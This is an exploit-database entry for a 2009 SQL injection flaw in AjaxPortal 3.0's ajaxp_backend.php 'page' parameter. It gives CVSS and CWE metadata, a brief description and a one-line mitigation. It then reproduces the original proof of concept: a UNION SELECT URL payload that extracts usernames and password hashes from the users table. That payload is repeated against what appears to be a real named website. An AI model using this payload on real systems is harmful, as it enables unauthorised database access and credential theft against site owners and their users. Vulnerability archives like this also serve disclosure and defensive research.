header-logo
Suggest Exploit
vendor:
AjaxPortal
by:
cOndemned
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: AjaxPortal
Affected Version From: 3
Affected Version To: 3
Patch Exists: YES
Related CWE: N/A
CPE: a:ajaxportal:ajaxportal:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

AjaxPortal 3.0 (ajaxp_backend.php page) Remote SQL Injection Vulnerability

A vulnerability exists in AjaxPortal 3.0, which allows an attacker to inject arbitrary SQL commands via the 'page' parameter in the ajaxp_backend.php page. Passwords are encoded using MySQL PASSWORD() function. (used algorithm depends on MySQL version.)

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

AjaxPortal 3.0 (ajaxp_backend.php page) Remote SQL Injection Vulnerability
Bug found && Exploited by cOndemned
Greetz: ZaBeaTy, d2, Beowulf, str0ke, Alfons Luja, 0in and others

Proof of Concept : http://[host]/[ajaxportal-3.0_path]/ajaxp_backend.php?page=-1+union+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+PREFIX_users--

Example : http://calmpc.net/ajaxp_backend.php?page=-1+union+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+dbPfixajaxp_users--


Passwords are encoded using MySQL PASSWORD() function. (used algorithm depends on MySQL version.)


// http://www.youtube.com/watch?v=dX_PLimGeHk&flip=1 :P

# milw0rm.com [2009-04-01]

Navigation

Suggest Exploit

Services By CQR